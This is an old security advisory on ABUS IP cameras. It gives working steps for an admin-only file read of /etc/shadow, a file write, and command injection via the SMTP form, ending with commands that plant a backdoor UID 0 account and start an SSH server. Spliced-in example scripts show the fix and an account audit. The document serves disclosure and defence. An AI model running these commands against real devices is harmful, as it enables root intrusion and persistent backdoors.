
13 October 2011

ABUS TVIP 11550/21550 File Read / File Upload / Command Exec

Title  : ABUS TVIP 11550/21550 Multiple vulnerabilities (and possibly other ABUS cams)
Author : Marco van Berkum

- Summary
- Arbitrary file read
- Arbitrary file upload
- Arbitrary command execution (input validation bug)
- How it's totally compromised, including SSH root login

- Summary

The ABUS TVIP 11550 and 21550 are IP webcams that are configured through a
web interface. While experimenting, multiple vulnerabilities were discovered
that give root access to the camera's operating system (Debian Linux). The
camera's web server is BOA and it runs as root.

Although these vulnerabilities can ONLY be exploited when logged in as
admin, they can still be considered critical, since a compromised camera can
be used to gain access to the network behind it. I did not find a way past
the login screen without proper credentials (yet).

- Arbitrary file read

When logged in as admin it is possible to read any file on the filesystem,
since the web server runs as root:

http://ipcamera/cgi-bin/admin/fileread?READ.filePath=/etc/shadow

- Arbitrary file upload

Similar to the fileread CGI, there is also a filewrite CGI that can
(over)write any file:

http://ipcamera/cgi-bin/admin/filewrite?SAVE.filePath=/tmp/file%26SAVE

- Arbitrary command execution (input validation bug)

The camera has several HTML forms to configure services such as an FTP
client and an SMTP client. These are used to notify users and upload video
when the camera's motion detection detects movement. These forms can be used
to execute arbitrary commands as root. I've found the bug in the SMTP and
FTP forms, but other forms probably contain the same bug (unchecked).

Exploit:
In Configuration -> SMTP General there is a web form where an
administrator's e-mail address can be filled out (Administrator e-Mail
address). The form does not check for shell metacharacters such as ;, | and `.
When a test e-mail is sent from this form, the web interface runs ssmtp -t
with the address on its command line, so it is possible to 'break' the
command line by using `ls`, for instance. After submitting the command via
the test button this will be the output:

smtp: Connect to host

smtp: MAIL FROM:
SMTP server error
................SMTP Test Failed...........

Which means we are situated in a directory that contains a backup directory.

`pwd` also works:

smtp: Connect to host

smtp: MAIL FROM:
SMTP server error
................SMTP Test Failed...........

Unfortunately this only shows the first line of the command's output.
But we can work around this :)

The system also has a System Log function that shows the contents of the
system log. If we want more than just the first line, for instance for
"ls /", we can fill out `ls /|logger`, which sends the output to the system
log. It can then be viewed from the web interface:

Oct  8 14:35:15  root: bin
Oct  8 14:35:15  root: dev
Oct  8 14:35:15  root: etc
Oct  8 14:35:15  root: include
Oct  8 14:35:15  root: init
Oct  8 14:35:15  root: lib
Oct  8 14:35:15  root: linuxrc
Oct  8 14:35:15  root: mnt
Oct  8 14:35:15  root: opt
Oct  8 14:35:15  root: proc
Oct  8 14:35:15  root: root
Oct  8 14:35:15  root: sbin
Oct  8 14:35:15  root: smtp_test.sh
Oct  8 14:35:15  root: sys
Oct  8 14:35:15  root: tag_replace.sh
Oct  8 14:35:15  root: tmp
Oct  8 14:35:15  root: usr
Oct  8 14:35:15  root: var
Oct  8 14:35:15  root: web

The complete command output can also be obtained by redirecting it to a
readable file in the web server's document root, e.g. `ls -alR
/>/web/html/lsoutput.txt`.
It can then be accessed at the URL http://ipcamera/lsoutput.txt
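The bug class behind the SMTP form, reconstructed as an added example that is not the camera's own smtp_test.sh (the advisory does not reproduce that script). The vulnerable function assumes the original pastes the form value into a command string that the shell re-parses; `fake_ssmtp` stands in for `ssmtp -t` so the script runs offline, and the hardened variant shows the fix: a whitelist on the address plus passing it as a single argument instead of through eval.

```sh
#!/bin/sh
# Added example, not code from the advisory or the vendor. It reproduces the
# input-validation bug described above: the administrator e-mail address is
# spliced unquoted into a shell command line, so `...`, ; and | in the field
# are interpreted by the shell that launches the mail client.

# Stand-in for "ssmtp -t" (assumption, so the example runs without a mail
# setup): it only echoes the arguments it was handed instead of speaking SMTP.
fake_ssmtp() {
    printf 'ssmtp got:%s\n' "$*"
}

# VULNERABLE (assumed shape of the camera's script): the form value is pasted
# into a command string which is then re-parsed by the shell via eval. A value
# such as `id` or "x;cmd" therefore runs cmd as the web server's user, which on
# the camera is root.
smtp_test_vulnerable() {
    addr="$1"
    cmd="fake_ssmtp -t $addr"
    eval "$cmd"
}

# HARDENED: reject anything outside a conservative address alphabet, and pass
# the value as one argument so it is never re-parsed by a shell. Even without
# the whitelist the quoted argument alone already stops `...`, ; and | from
# being interpreted; the whitelist additionally blocks leading dashes that
# could be read as ssmtp options.
smtp_test_hardened() {
    addr="$1"
    case "$addr" in
        "" | -* | *[!A-Za-z0-9._%+@-]*)
            printf 'rejected address: %s\n' "$addr" >&2
            return 1 ;;
    esac
    fake_ssmtp -t "$addr"
}

# Demo with the payload from the post: leak pwd through the mail command line.
demo() {
    echo "--- vulnerable, payload: admin@example.com;pwd"
    smtp_test_vulnerable "admin@example.com;pwd"
    echo "--- hardened, same payload"
    smtp_test_hardened "admin@example.com;pwd" || echo "blocked"
    echo "--- hardened, legitimate address"
    smtp_test_hardened "admin@example.com"
}
```

Run `demo` to see the vulnerable path execute `pwd` while the hardened path refuses the same value. The same `;cmd|logger` or `` `cmd` `` payloads the post uses against the camera work against `smtp_test_vulnerable` unchanged.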

- How it's totally compromised, including SSH root login

I did it in a few steps. First I did a `ls -alR />/web/html/lsoutput.txt` to
see what was on the filesystem and noticed that dropbear is available on the
system. Dropbear is an SSH server/client :)
So I started it with the `/etc/dropbear/dropbear` command.

Then I took a look at the /etc/shadow file and noticed that user root had
no password, so ssh'ing in was not an option, yet. So I had to create a
user, which I did the following way:

`echo "test:x:0:0:test:/tmp:/bin/sh">>/etc/passwd`
and
`echo "test:$1$/DqZS5Cm$PUeCTPpYIrGQnxsZtsfDY1:12963:0:99999:7:::">>/etc/shadow`

So now we can log in as user test with password test. User test has UID 0,
thus root.

test@ipcamera's password:
Welcome to

[ASCII-art vendor banner, garbled]

For further information check:
http://www.GM.com/



BusyBox v1.1.3 (2010.05.10-11:54+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

[test]#

Voila ;)
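The persistence step above leaves two things a defender can check for on a pulled copy of the camera's account files: a second UID 0 account, and accounts with an empty shadow hash. The audit below is an added example (not from the advisory); it takes file paths as parameters so it can be run against copies retrieved with the fileread CGI, and the sample passwd/shadow contents are constructed to mirror the state the post describes.

```sh
#!/bin/sh
# Added example, not part of the advisory: audit a passwd/shadow pair for the
# two conditions the post relies on. Paths are parameters so the functions can
# be pointed at copies pulled off the camera (e.g. via the fileread CGI).

# Print every account with UID 0 other than root, one name per line.
# Fields in passwd: name:pw:uid:gid:gecos:home:shell
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Print every account whose shadow hash field is empty, i.e. no password at
# all. Locked accounts ("!" or "*") are deliberately not reported.
empty_password_accounts() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# Print accounts whose shadow field looks like a real hash but whose home is
# under /tmp, a cheap tell for a hand-appended entry like the one above.
tmp_home_accounts() {
    awk -F: '$6 ~ /^\/tmp(\/|$)/ { print $1 }' "$1"
}

# Constructed sample data (assumption, mirrors the state described in the
# post): root has no password and a UID 0 user "test" was appended.
write_sample() {
    dir="$1"
    cat > "$dir/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
test:x:0:0:test:/tmp:/bin/sh
EOF
    cat > "$dir/shadow" <<'EOF'
root::12963:0:99999:7:::
daemon:*:12963:0:99999:7:::
test:$1$/DqZS5Cm$PUeCTPpYIrGQnxsZtsfDY1:12963:0:99999:7:::
EOF
}

# Run all three checks against the constructed sample and clean up.
audit_demo() {
    dir=$(mktemp -d)
    write_sample "$dir"
    echo "UID 0 accounts besides root:"; extra_uid0_accounts "$dir/passwd"
    echo "accounts with empty password:"; empty_password_accounts "$dir/shadow"
    echo "accounts with a home under /tmp:"; tmp_home_accounts "$dir/passwd"
    rm -rf "$dir"
}
```

`audit_demo` reports `test` for the first and third checks and `root` for the second; on a real device, run the first two functions against the live /etc/passwd and /etc/shadow and treat any output as a finding.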

It is also possible to mount a Samba or NFS share via the web interface and
copy files that way.

Just my two cents
Marco van Berkum
